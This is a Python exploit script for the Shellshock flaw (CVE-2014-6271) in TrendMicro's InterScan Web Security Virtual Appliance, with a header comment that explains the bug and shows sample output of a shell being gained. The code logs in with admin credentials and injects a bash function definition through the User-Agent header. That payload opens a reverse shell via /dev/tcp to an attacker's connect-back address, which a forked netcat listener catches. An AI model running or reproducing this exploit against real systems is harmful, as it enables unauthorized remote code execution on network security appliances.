TrendMicro InterScan Web Security Virtual Appliance Shellshock

`#!/usr/bin/env python  
# TrendMicro InterScan Web Security Virtul Appliance  
# ==================================================  
# InterScan Web Security is a software virtual appliance that   
# dynamically protects against the ever-growing flood of web   
# threats at the Internet gateway exclusively designed to secure   
# you against traditional and emerging web threats at the Internet   
# gateway. The appliance however is shipped with a vulnerable  
# version of Bash susceptible to shellshock (I know right?). An  
# attacker can exploit this vulnerability by calling the CGI  
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited  
# to perform arbitrary code execution. A limitation of this   
# vulnerability is that the attacker must have credentials for  
# the admin web interface to exploit this flaw. The panel runs  
# over HTTP by default so a man-in-the-middle attack could be  
# used to gain credentials and compromise the appliance.  
#   
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1  
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit  
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'  
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA  
# [-] exploiting shellshock CVE-2014-6271...  
# bash: no job control in this shell  
# bash-4.1$ id  
# uid=498(iscan) gid=499(iscan) groups=499(iscan)  
#   
# -- Hacker Fantastic   
#  
# (https://www.myhackerhouse.com)  
import SimpleHTTPServer  
import subprocess  
import requests  
import sys  
import os  
  
def spawn_listener():  
os.system("nc -l 8080")  
  
def shellshock(ip,session,cbip):  
user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}  
cookies = {'JSESSIONID': session}  
print "[-] exploiting shellshock CVE-2014-6271..."  
myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)  
  
def login_http(ip,user,password):  
mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}  
print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)  
myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)   
session_cookie = myreq.history[0].cookies.get('JSESSIONID')  
print "[-] JSESSIONID = %s" % session_cookie   
return session_cookie  
  
if __name__ == "__main__":  
print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"  
if len(sys.argv) < 5:  
print "[-] use with <ip> <user> <pass> <connectback_ip>"  
sys.exit()  
newRef=os.fork()  
if newRef==0:  
spawn_listener()  
else:  
session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])  
shellshock(sys.argv[1],session,sys.argv[4])  
`